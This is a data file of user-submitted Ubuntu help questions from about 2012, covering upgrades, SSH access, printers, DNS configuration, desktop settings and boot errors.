115091	ubuntu server 11.10 64bit - ftp	i am new to linux as due to a requirement at work we are trailing splunk which runs better un linux . so i have installed ubuntu server 11.10 and put it in the dc with ssh access . however , i have since realized that really i also need transfer files and folders to the server and as such need to work out the best way to do this . i also need to bear in mind there is not internet connectivity to the server and firewall ( s ) are blocking all ports except 22 , although could request for more to be opened if needed . from my understanding you can not transfer files via ssh itself over port 22 ? does the server need setting up as an ftp server to be able to receive files ? if it does need to be setup as an ftp server are there any in-built to the o/s ? many thanks for the input and help
115094	webex desktop sharing on 64-bit ubuntu	i realize that webex does not support ubuntu 11 , however i have a website running on my machine that i need to demo for a client and he will use webex . i need to be able to use the `` share desktop '' feature to do this . is there any dependable way ( gksudo , java installation , browser , anything ) that lets you share your desktop ? i do n't care if the audio crashes since we talk on the phone , and it 's okay if it cuts out from time to time -- i just need him to be able to see it . alternatively , is there an easy way for me to switch to an ubuntu version that will allow me to share my desktop ?
115095	glibc_2.8 not found	as a newbie i seem to have messed up my upgrade leaving my system in a very unstable state . i attempted an upgrade from 8.04lts which ended in an error about libc and kernel upgrades . i tried to upgrade the kernel but am now unsure if that worked , because when i retried my dist-upgrade there was a lot of errors about pre-dependencies and leaving packages un-configured . now i have a system that answers almost every command with : /lib/libc.so.6 : version `glibc_2.8 ' not found ( required by /lib/libselinux.so.1 ) i probably should try a complete re-installation , but i 'm investigating if there is any possibility of getting a working glibc so that i at least can have some commands working to ensure that my backups are recent etc . before doing the clean install . not even 'ls ' works without saying `` glibc_2.8 not found '' .
115096	how to reset ccsm opacity back to 100 % ?	by mistake i set ccsm 's opacity to 0 so when i run it it looks as if it was n't open . how to reset it to 100 % opaque without resetting compiz ? ? ?
115101	system monitor resources customisation	im currently usig ubuntu as a server , and i use gnome-system-monitor to track ( visually ) how much cpu load is being consumed , however , i only see the last 60 seconds of usage . is there a way to set the gnome-system-monitor to remember the last 300 seconds ( or some other value ) ? thanks ,
115105	phonon - audio hardware setup	does anyone know what configuration file is modified when i change settings within this area of the system settings ? i keep choosing my logitech usb headset as the soundard , and , when i hit apply , it accepts that change and all is good . however , as soon as i close the system settings window , it loses the setting , so i have to leave it open all the time . how can i make this setting permanent ? thanks for any assistance . i 'm actually running kubuntu 11.10 .
115109	install ubuntu on full encrypted hd ?	i have here a windows on a full encrypted hd . i can not disable this encrypted hd . everything should be unchanged , i just want to install ubuntu on an extra partition . but here i think the problem is : if the full hd is encrypted i can not borrow some space for an extra partition right ? so what should i do ? : /
115113	change all associations from gedit to another application	i started using sublime text 2 a week or so ago and i loved it so much i 've spent $ 60 on it and now want to use it for everything . gedit currently has ownership of most of the text file associations . i 'd essentially like to replace any association to gedit with sublime-text-2 . any tips available on bulk association changing ?
115114	where can i obtain ubuntu software and server cds and a manual	i live in nigeria and i need to obtain the cds + a manual for the desktop and server versions of ubuntu 11.10 . is there any information available where i can order these ?
115116	can not create new folders - ubuntu on virtualbox	i 've just installed ubuntu using virtualbox on windows 7 , and everything went fine . i 'm trying to add new folders using the default file manager nautilus , but : create new folder is disabled in any system folder . it works within my user folder though . have i configured the virtual hdd incorrectly ? and here is my virtualbox config : sata controller ahci port count : 1
115121	hp psc-2100 ca n't seem to get xsane and hplip ( printing working )	i am trying to get my printer setup to both `` print '' and `` scan '' , yep , i need to do both . both attempts ( yep , i 've gone thru this twice ) . the first time i was able to print just fine , but the scanner did n't work , xsane was complaining about hpaio , etc . after i installed the : //hplipopensource.com/hplip-web/index.html allinone software i was able to print and scan , then something went wrong ( this is the question ? ? ? ) all print jobs immediately get put in `` held '' status , if i `` release '' them , they immediately go back to held . currently , i am able to scan ( perfectly might i add ) without any problems , i installed the hplip from : //help.ubuntu.com/community/hpallinone website after following some thread , it appeared that would solve my issues . working from https : //help.ubuntu.com/community/hpallinone , i am able to get a clean installed but when i get to the synaptic steps , i appears to me that hplip is installed multiple times as the hp lip device manager report software version:3.12.2 device mgr : 15.0 ( qt4 ) while synaptic is reporting:3.11.7-1 , which in the synaptic window appear not to be installed . in the synaptic window i only see `` openprint-ppds '' and `` pxljr '' as being installed . do i need to removed packages and start over , can i get back to `` out-of-the-box '' easily ? i 'm guessing by installing the opensource version i shot myself , but i 'm thinking that i was n't able to scan or something , that why i ended up following the links to hplip support . if i can forward any output ( eg : hp-check -t which is clean , no warnings/errors ) just ask ! thanks for your attention and help ,
115123	how can i upgrade ubuntu 10.04 to 11.04 ?	what should i do for this ? i know , that upgrade goes step by step , but how ? thanks !
115129	how do i install conky ?	i have tried some tutorials but all to no avail of late . how do i correctly configure conky on ubuntu 11.10 ?
115131	monospace and ubuntu mono	when trying to set the default font in terminal . there are two 'monospace ' fonts that interested me : 1 . ubuntu mono 2 . monospace . i found ubuntu mono in /usr/share/fonts , but i could n't find the other font 'monospace ' anywhere . where can i find it ? i 'd like to set it as my default font in other linux systems as well .
115134	how to make gwibber notifications clickable ?	one of the accounts that i have in gwibber is my twitter account . it nicely shows every now and then notifications with the new twits . whenever a twit has a link ( url ) within it i feel an urge to click on the link withing the notification to directly open it within a browser . however , it seems like notifications are not clickable and when hovering over them they just become opaque . is there a way to make those links clickable ?
115137	differences between gnome classic session and gnome 2 ?	i know gnome 2 is history but the gnome classic session looks ( to me ) exactly like gnome 2 i.e . as per how to revert to gnome classic ? are there any differences between the two desktop environments ?
115138	what is controlling the desktop display ?	i have two ubuntu systems and in the course of changing configurations something has become muddled . i have disabled unity in favor of gnome shell , the older style display of the desktop . then i installed xfce 4 . seemed everything would be working okay , and for the most part it does . except i noticed that on one system there 's something else controlling settings . on one , if i right click the desktop , i get the menu with the options : open in new window create launcher ... create url link ... create folder ... create from template - > open terminal here paste desktop settings ... properties ... applications - > on system two , right clicking brings up the menu : create new folder create new document - > organize desktop by name keep aligned paste change desktop background additionally , even though i set the background with the xfce settings manager , on system two that background will appear for a few seconds before it 's replaced by something that looks like a background from ubuntu 's original desktop . and it 's being controlled by what comes up with the `` change desktop background '' when right clicking , which is n't the xfce settings manager . on the first system , that right click does bring up the xfce settings tool . in short , something is controlling/overriding the xfce settings on machine two , but i ca n't find what file or configuration tool is doing it . how can i get system two to behave as system one , giving control of settings and configuration of x to xfce 's tools ?
115142	how to set power_profile at boot	so when i log on , i go to a terminal and type echo `` mid '' | sudo tee /sys/class/drm/card0/device/power_profile which means my laptop works without the fan being constantly on . it would be great it i did n't have to do this ; i would like this to be done for me , and without me having to enter the password for sudo .
115146	how can i customize an icon on the dash/launcher ?	all . i have a question that has been bugging me recently.. say i install blender.. i am using the bumblebee project thing , so in order to properly use it , i have to go to the terminal and type `` optirun blender '' . if i just click on the icon on the dash , it will run without the proper parameter being passed . is there a way i could customize the blender launcher on the dash so it would always launch it with the optirun parameter ? thanks .
115151	how to setup passwordless ssh access for root user	i need to configure a machine so software installation can be automated remotely via ssh . following the wiki , i was able to setup ssh keys so my user can access the machine without a password , but i still need to manually enter my password when i use sudo , which obviously an automated process should n't have to do . although my /etc/ssh/sshd_config has permitrootlogin yes , i ca n't seem to be able to login as root , presumably because it 's not a `` real '' account with a separate password . how do i configure ssh keys , so a process can remotely login as root on ubuntu ?
115155	warning message during boot after installation of kernel 3.3 : kernel needs apparmor 2.4 compatibility patch	i have ubuntu server 11.10 and after installation of kernel 3.3 ( i just followed instructions from site www.upbuntu.com - how to install linux 3.3 kernel in ubuntu 11.10/12.04 ) it shows me following message during boot : fsck from util-linux 2.19.1 fsck from util-linux 2.19.1 /dev/sda5 : clean , 204099/1152816 files , 988854/4608639 blocks /dev/sda6 : clean , 2345/1281120 files , 142711/5120710 blocks modem-manager [ 830 ] : modemmanager ( version 0.5 ) starting ... * starting mdns/dns-sd daemon [ 154g [ ok ] * starting cups printing spooler/server [ 154g [ ok ] * starting mount network filesystems [ 154g [ ok ] * stopping mount network filesystems [ 154g [ ok ] * starting system v initialisation compatibility [ 154g [ ok ] * stopping failsafe boot delay [ 154g [ ok ] cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/bin.ping ( /etc/apparmor.d/bin.ping line 28 ) : profile /bin/ping network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/lightdm-guest-session ( /etc/apparmor.d/lightdm-guest-session line 71 ) : profile /usr/lib/lightdm/lightdm-guest-session-wrapper network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/sbin.dhclient ( /etc/apparmor.d/sbin.dhclient line 73 ) : profile /sbin/dhclient network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/sbin.klogd ( /etc/apparmor.d/sbin.klogd line 35 ) : profile /sbin/klogd network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/sbin.syslog-ng ( /etc/apparmor.d/sbin.syslog-ng line 52 ) : profile /sbin/syslog-ng network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/sbin.syslogd ( /etc/apparmor.d/sbin.syslogd line 40 ) : profile /sbin/syslogd network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.bin.chromium-browser ( /etc/apparmor.d/usr.bin.chromium-browser line 165 ) : profile /usr/lib/chromium-browser/chromium-browser network rules not enforced warning from /etc/apparmor.d/usr.bin.chromium-browser ( /etc/apparmor.d/usr.bin.chromium-browser line 165 ) : profile browser_java network rules not enforced warning from /etc/apparmor.d/usr.bin.chromium-browser ( /etc/apparmor.d/usr.bin.chromium-browser line 165 ) : profile browser_openjdk network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.bin.evince ( /etc/apparmor.d/usr.bin.evince line 142 ) : profile /usr/bin/evince network rules not enforced warning from /etc/apparmor.d/usr.bin.evince ( /etc/apparmor.d/usr.bin.evince line 142 ) : profile /usr/bin/evince-previewer network rules not enforced warning from /etc/apparmor.d/usr.bin.evince ( /etc/apparmor.d/usr.bin.evince line 142 ) : profile /usr/bin/evince-thumbnailer network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) skipping profile in /etc/apparmor.d/disable : usr.bin.firefox cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.lib.dovecot.deliver ( /etc/apparmor.d/usr.lib.dovecot.deliver line 24 ) : profile /usr/lib/dovecot/deliver network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.lib.dovecot.dovecot-auth ( /etc/apparmor.d/usr.lib.dovecot.dovecot-auth line 24 ) : profile /usr/lib/dovecot/dovecot-auth network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.lib.dovecot.imap ( /etc/apparmor.d/usr.lib.dovecot.imap line 23 ) : profile /usr/lib/dovecot/imap network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.lib.dovecot.imap-login ( /etc/apparmor.d/usr.lib.dovecot.imap-login line 22 ) : profile /usr/lib/dovecot/imap-login network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.lib.dovecot.managesieve-login ( /etc/apparmor.d/usr.lib.dovecot.managesieve-login line 22 ) : profile /usr/lib/dovecot/managesieve-login network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.lib.dovecot.pop3 ( /etc/apparmor.d/usr.lib.dovecot.pop3 line 22 ) : profile /usr/lib/dovecot/pop3 network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.lib.dovecot.pop3-login ( /etc/apparmor.d/usr.lib.dovecot.pop3-login line 21 ) : profile /usr/lib/dovecot/pop3-login network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.lib.telepathy ( /etc/apparmor.d/usr.lib.telepathy line 86 ) : profile /usr/lib/telepathy/mission-control-5 network rules not enforced warning from /etc/apparmor.d/usr.lib.telepathy ( /etc/apparmor.d/usr.lib.telepathy line 86 ) : profile /usr/lib/telepathy/telepathy-* network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.sbin.avahi-daemon ( /etc/apparmor.d/usr.sbin.avahi-daemon line 30 ) : profile /usr/sbin/avahi-daemon network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.sbin.cupsd ( /etc/apparmor.d/usr.sbin.cupsd line 170 ) : profile /usr/lib/cups/backend/cups-pdf network rules not enforced warning from /etc/apparmor.d/usr.sbin.cupsd ( /etc/apparmor.d/usr.sbin.cupsd line 170 ) : profile /usr/sbin/cupsd network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.sbin.dnsmasq ( /etc/apparmor.d/usr.sbin.dnsmasq line 51 ) : profile /usr/sbin/dnsmasq network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.sbin.dovecot ( /etc/apparmor.d/usr.sbin.dovecot line 37 ) : profile /usr/sbin/dovecot network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.sbin.identd ( /etc/apparmor.d/usr.sbin.identd line 31 ) : profile /usr/sbin/identd network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.sbin.mdnsd ( /etc/apparmor.d/usr.sbin.mdnsd line 35 ) : profile /usr/sbin/mdnsd network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.sbin.mysqld ( /etc/apparmor.d/usr.sbin.mysqld line 44 ) : profile /usr/sbin/mysqld network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.sbin.nmbd ( /etc/apparmor.d/usr.sbin.nmbd line 21 ) : profile /usr/sbin/nmbd network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.sbin.nscd ( /etc/apparmor.d/usr.sbin.nscd line 46 ) : profile /usr/sbin/nscd network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.sbin.smbd ( /etc/apparmor.d/usr.sbin.smbd line 40 ) : profile /usr/sbin/smbd network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.sbin.tcpdump ( /etc/apparmor.d/usr.sbin.tcpdump line 64 ) : profile /usr/sbin/tcpdump network rules not enforced cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) warning from /etc/apparmor.d/usr.sbin.traceroute ( /etc/apparmor.d/usr.sbin.traceroute line 26 ) : profile /usr/sbin/traceroute network rules not enforced * starting apparmor profiles [ 160g [ 154g [ ok ] speech-dispatcher disabled ; edit /etc/default/speech-dispatcher checking for running unattended-upgrades : what does this warnings mean and how can i fix it ? informations about my system : response @ response : ~ $ uname -a linux response 3.3.0-030300-generic # 201203182135 smp mon mar 19 01:43:18 utc 2012 i686 i686 i386 gnu/linux
115164	ubuntu 11.10 lamp is very slow	my lamp stack on a local machine is too slow . i have successfully installed wordpress but any request ( e.g login , add new post ) is too slow . how can i resolve what 's wrong ? thank you in advance !
115166	why does the `` d '' key minimizes and restores the terminal ?	i have a remote system on which i defined two accounts - an administrator and a standard user . the machine was fallbacked from unity to gnome . i use vnc4server to remotely connect to the system , and realvnc viewer for the actual connection from my win 7 laptop . from the two accounts i started the servers as : > > vnc4server -geometry 1440x900 i also have the following ~/.vnc/xstartup file in both accounts : # ! /bin/sh # uncomment the following two lines for normal desktop : unset session_manager unset dbus_session_bus_address gnome-session -- session=gnome-classic & [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey vncconfig -iconic & now , when i connect to the admin account , i get a desktop and can open a terminal to type my commands . on the user account , however , i can do the same - but when i type the d key , the terminal minimizes , until i press the key again . what 's going on here ? how can i claim my d back ? edit : thanks to @ zigg , i found the problem . i wonder , though , where does it inherited the `` d '' shortcut from ? this is a fresh account and the changes i made were just to the .vnc file above ? ? ?
115170	can i remove the pulsing xfce logo on logon in xubuntu 11.10 ?	on xubuntu 11.10 , when i log in , the xfce mouse pulses in front of a white-grey screen for a few seconds as everything starts up . is there a way to remove this , or replace it with something else ? even something hacky like editing the image png to be the same as its background is fine .
115171	11.10 suddenly became 2d	after today 's update ubuntu became 2d despite the fact that i logged in under `` ubuntu '' not `` ubuntu 2d '' . also some other issues appeared ( e.g . my shortcuts rolled back , num pad does n't work , caps lock key do n't have any effect on case , when i 'm typing in dash - it doubles every letter - 'n ' -- > 'nn ' ) here is update log : setting up google-chrome-stable ( 17.0.963.83-r127885 ) ... setting up libavutil51 ( 4:0.8.1-1~ppa1 ) ... setting up libpostproc52 ( 4:0.8.1-1~ppa1 ) ... setting up libswscale2 ( 4:0.8.1-1~ppa1 ) ... setting up libavcodec53 ( 4:0.8.1-1~ppa1 ) ... setting up libavformat53 ( 4:0.8.1-1~ppa1 ) ... setting up libbluray1 ( 1:0.2.2-1~ppa1 ) ... setting up libmp3lame0 ( 3.99.5+repack1-3~ppa1 ) ... setting up libx264-120 ( 2:0.120.2171+git01f7a33-3~ppa1 ) ... setting up libxvidcore4 ( 2:1.3.2-9~ppa1 ) ... setting up thunderbird ( 11.0+build1-0ubuntu0.11.10.1 ) ... installing new version of config file /etc/apport/blacklist.d/thunderbird ... setting up thunderbird-globalmenu ( 11.0+build1-0ubuntu0.11.10.1 ) ... setting up thunderbird-gnome-support ( 11.0+build1-0ubuntu0.11.10.1 ) ... setting up thunderbird-locale-en ( 1:11.0+build1-0ubuntu0.11.10.1 ) ... setting up thunderbird-locale-en-gb ( 1:11.0+build1-0ubuntu0.11.10.1 ) ... setting up thunderbird-locale-en-us ( 1:11.0+build1-0ubuntu0.11.10.1 ) ... setting up thunderbird-locale-ru ( 1:11.0+build1-0ubuntu0.11.10.1 ) ... setting up ubuntu-tweak ( 0.6.2-1~oneiric1 ) ... setting up xul-ext-calendar-timezones ( 1.3+build1-0ubuntu0.11.10.1 ) ... setting up xul-ext-lightning ( 1.3+build1-0ubuntu0.11.10.1 ) ... setting up xul-ext-gdata-provider ( 1.3+build1-0ubuntu0.11.10.1 ) ... here is .xsession-errors file first line : gnome-session [ 6568 ] : warning : session 'ubuntu ' runnable check failed : exited with code 1 any ideas ? i can provide the rest of file , but it pretty long
115173	why are there no amd64+mac images for precise beta 1 ?	when i installed oneiric on my acer aspire ao722-0828 , i needed to use the amd64+mac images . i 'd like to try precise now , but there are no beta 1 amd64+mac imagesâonly amd64 ; i 've looked in both http : //releases.ubuntu.com/precise/ and http : //cdimages.ubuntu.com/releases/precise/beta-1/ . is the amd64+mac issue resolved ? based on this explanation , i 'd expect it 's impossible to `` resolve '' it , but the lack of beta images makes me wonder .
115179	executing 'grub-install/dev/sda1 ' failed	trying to install ubuntu 11.10 on a partition of a hard disk , but keep getting this error : executing grub-install/dev/sda1 failed ca n't delete all partitions as there is important data on the other partitions .
115180	why is ubuntu replacing banshee with rhythmbox in 12.04 ?	is is because of mono thing ? is it the gtk3 support thing ? or i dont know ... what value rhythmbox ( replacing banshee ) adds to ubuntu 12.04 . i feel banshee has a far better interface than rhythmbox . why dont rhythmbox just redo the interface . btw any good music player in market . apart from tomahawk .
115182	how do i remove a site from squidguard blacklist ?	i have just installed squidguard in my server to restrict porn or adult site . i followed these instruction . it 's working great . problem is squiguard list ( blacklist ) youtube.com as porn site . i want to remove youtube from blacklist . how can i do this ? database save in /var/lib/squidguard/blacklist/ ... i found several youtube site links in blacklist/porn/uris but when i tried to open it with gedit ( with root permission ) it says some char does not show , modify this file can corrupt the file.` is there any good way to remove a site or add a site in squidguard blacklist ?
115184	ubuntu suddenly does not load anymore	for the first time ever - ubuntu will not load . it was working fine this morning , but since it will not work . i can not get it past the initial security area where it asks for a password , but even then - it will not load it enough so that the password can be entered . i am not tech savvy , but i 'd like to keep the previous files , and links - then reinstall ubuntu back on the system . ideally i 'd like to wipe it clean but only have the ubuntu 9.10 desktop edition single disc . can anyone help with a walk through ?
115187	how do i get my canon mx420 printer running ?	i followed the answer given to same question i 'm asking , but get stuck at the point shown below . answer i used came from here : how do i get my canon mx420 printer working ? point where i ran into a problem : aa @ aa-laptop : ~ $ sudo /usr/sbin/lpadmin -p mx420usb -m canonmx420.ppd -v cnijusb : /dev/usb/lp0 -e lpadmin : unable to copy ppd file ! thanks , brian
115188	dkms : rebuild kernel module for manually installed upstrem kernel	i installed an `` upstream kernel '' ( downloaded deb and installed with dpkg ) because of an issue i have with the default kernel ( see https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/956918 ) now the custom battery settings i had are lost . i used the kernel modukle tp-smapi to change this settings on a thinkpad . if i try to load this module now , it fails because it was not built for this kernel . the installed packages are `` tp-smapi-dkms '' and `` tp-smapi-source '' . automatic rebuilding seems not to have been triggered . how can i do it manually ?
115192	problem after interrupted installation of adobe flash	i am using ubuntu . yesterday i have installed adobe flash plugin to my laptop . the installation was interrupted , and it did n't complete . however , the software shows in the installed software menu . today i have tried to install another program , but the attempt failed , with error message 'your last installation was incomplete , fix that first ' . the problem is that i ca n't remove adobe flash from the laptop , and ca n't install anything else . kindly help me .
115201	how to make startup application to open the folder or inode/directory after booting ?	i think it will be awesome if after login the folder that locate not at the same localhost / can open it self like and application as skype and others . do we can make it because if this one works for it , it will help others people too that save musics and other file under the /home folder or the like me , i do need to click other partitions to listen songs and movie and other what i want is just single click when i do login . the partitions / folder / inode was open so i can simply click the play button at the rhythmbox and click next just to watch the next edition of serial movies ^^ here the photos , i need this partition / hard disk to open during start-up `` almacén hard disk . thx for daniel request . santos @ santos : ~ $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 298.1g 0 disk ├─sda1 8:1 0 1k 0 part ├─sda2 8:2 0 100m 0 part ├─sda3 8:3 0 68.6g 0 part ├─sda4 8:4 0 130.9g 0 part /media/almacén ├─sda5 8:5 0 46.6g 0 part ├─sda6 8:6 0 2.3g 0 part [ swap ] ├─sda7 8:7 0 46.6g 0 part / └─sda8 8:8 0 3.1g 0 part [ swap ] sr0 11:0 1 1024m 0 rom
115204	always on visible workspace ( or sticky ) button for unity	i would like to have the ability to have a button in unity windows that causes the window to appear on all workspaces . i know you can accomplish this by accessing the window menu and clicking 'always on visible workspace ' but i 'd like a button like close , minimize , maximize . i know when i first came to linux this feature existed on most window managers but it seems that it 's been slowly disappearing . is there a way to bring this back ? p.s . the purpose of this is to have a button in the window titlebar that accomplishes this task . i know this is possible through keyboard shortcuts and the window menu .
115206	ubuntu 11.10 server monitor goes `` out of range '' ( not grub related )	i 'm installing ubuntu server 11.10 on two old servers ( asus cuv4x-d , dual p3 1ghz ) . for vid cards they have old ati 4mb pci cards on the riser . i can get into the ubuntu server cd fine , install fine and then once i reboot to run the install my lcd monitor goes `` out of range '' . the server should be fine to run headless at this point but i ca n't start ssh or even ping it so it seems like its stuck doing something . i followed the post here about editing grub for a different resolution i tried a few lcd ones and it did n't make a difference .
115208	acer aspire 1360 graphic driver problem ( half black screen )	i have an acer aspire 1360 and half my screen is black , i can not change my resolution because then my computer freezes . i am running the lastest ubuntu and have tried anything any advice . i 've also searched forums and many have this problem but could n't find a fix and ubuntu is impossible to use like this , any help would be appreciated .
115209	scale mode window on same workspace ?	i have recently upgraded from ubuntu 11.10 to ubuntu 12.04 . generally in unity if we open several interface of an application then we can switch them by double clicking the icon of the application on unity panel . it shows the opened application 's multiple interface in scale mode . but ubuntu 12.04 does not show the windows of different workspace in scale mode . if i open three nautilus , two in same and one in different workspace then click on icon show two interface ( which workspace contains two ) . that 's means it only shows current workspace 's application 's interface . is it a bug or feature of ubuntu 12.04 ? is there any way to fix it ?
115211	how do i share links to album in the u1 music store ?	first of all i open the dash and click the musical note icon . then i search for an album or song . now i 've found it i want to send a link to my friend on facebook/twitter/google+ . how do i do that ?
115218	how do i access a lion usb recovery stick from ubuntu ?	i have an os x lion recovery stick that i would like to access , specifically to use it to install lion in a virtualbox vm . i notice that windows detects and mounts the recovery stick as an optical drive . i know the drive works , because i am able to install lion from it on a mac . in ubuntu , the drive does not automount , and i can not figure out how to mount it manually . ubuntu version is 11.04 amd64 . i have not found any forum posts or comments from other people trying to do this . the output of wodim -- devices : 0 dev='/dev/sg3 ' rwrw -- : 'apple ' 'usb disk' when i try to mount it with sudo mount -t iso9660 /dev/sg3 /mnt : mount : special device /dev/sg3 does not exist when i dmesg | tail : [ 12825.417616 ] usb 2-1 : usb disconnect , device number 60 [ 12826.140121 ] usb 2-1 : new high speed usb device number 61 using ehci_hcd [ 12826.300555 ] scsi44 : usb-storage 2-1:1.0 [ 12827.707143 ] scsi 44:0:0:0 : cd-rom apple usb disk 1100 pq : 0 ansi : 2 [ 12827.727467 ] sr0 : scsi3-mmc drive : 94x/94x writer dvd-ram cd/rw xa/form2 cdda tray [ 12827.727780 ] sr 44:0:0:0 : attached scsi cd-rom sr0 [ 12827.728188 ] sr 44:0:0:0 : attached scsi generic sg3 type 5 any ideas how to mount this volume and read from it ?
115220	how do i make thinkpad x220t tablet with multitouch screen work ?	i am have a thinkpad x220t with the multitouch screen . this model comes with two options for the screen , only one has the multitouch capabilities . my question is strictly about touchscreen not the multi touch touchpad . i found it very hard to find confirmation if multi touch on this model works or not , and if so , how well ? so in this question i will focus primarily on how to improve multi touch interaction on this device . i am using ubuntu 12.04 . what are my top options for on-screen keyboard and how can i enable them ? can i use multitouch gestures to switch between apps , desktops and zoom in an out of applications while in tablet mode ? how many touch points are registered by the system at most ? how can i test this ? is multi touch stack stable enough for daily use ? how do i get the screen rotation button to work and how do i make pen reference rotate with it , so the pen works correctly in any rotation . how can i use multitouch games that are available from the the software repository ? on first try , it seems that touch points are not registered correctly by these applications . i will update this question if you require any more information , or tests performed on this laptop .
115225	dynamic bind9 + dhcp	i have been working on setup a server for my internal network , so far i have a working isc-dhcp-server that can upgrade a chrooted bind9 ( on the same machine ) , i need to add some static entries on the dns , so users can resolve the websites that resides in our dmz . what i had tryed all ready was to modify the /etc/bind/named.conf.local with this info : // // do any local configuration here // // consider adding the 1918 zones here , if they are not used in your // organization //include `` /etc/bind/zones.rfc1918 '' ; key dhcp_updater { algorithm hmac-md5.sig-alg.reg.int ; secret `` mysupersecrethash '' ; ( this is not the real value btw ) } ; zone `` quality.internal '' in { type master ; file `` /var/lib/bind/quality.internal.db '' ; allow-update { key dhcp_updater ; } ; } ; zone `` 0.10.10.in-addr.arpa '' { type master ; file `` /var/lib/bind/rev.10.10.0.in-addr.arpa '' ; allow-update { key dhcp_updater ; } ; } ; logging { channel query.log { file `` /var/log/named/query.log '' ; severity debug 3 ; } ; category queries { query.log ; } ; } ; then i added this 2 entries : zone `` ourserver.internal '' in { type master ; file `` /var/lib/bind/ourserver.internal.db '' ; } ; zone `` 0.16.172.in-addr.arpa '' { type master ; file `` /var/lib/bind/rev.172.16.0.in-addr.arpa '' ; } ; so.. i created the files ourserver.internal.db and rev.172.16.0.in-addr.arpa placed them both in /var/lib/bind/ and changed the permisions so the bind user can access them , restated the service ... when i do a nslookup www.ourserver.internal i get : server : 127.0.0.1 address : 127.0.0.1 # 53 ** server ca n't find www.ourserver.internal : nxdomain but when i do a reverse lookup ... . server : 127.0.0.1 address : 127.0.0.1 # 53 5.0.16.172.in-addr.arpa name = www.ourserver.internal i do not understand what 's wrong . some help with this will save me from installing a new dns server at the dmz just to host internal site names- ty in advance btw : the server i 'm using has ubuntu server 11.10 fully patched .
115227	virtualbox update	mac osx - snow leopard is host os and ubuntu-10.1 and windows xp are guest os . i recently updated vittualbox to 4.1.10 ubuntu did not boot immediately , it did an entire system scan and took about 2 hrs to boot . now it boots regularly but it does not find wireless internet connection , even connecting cable does not help . however internet works great in window xp . i am totally lost , i would appreciate your help
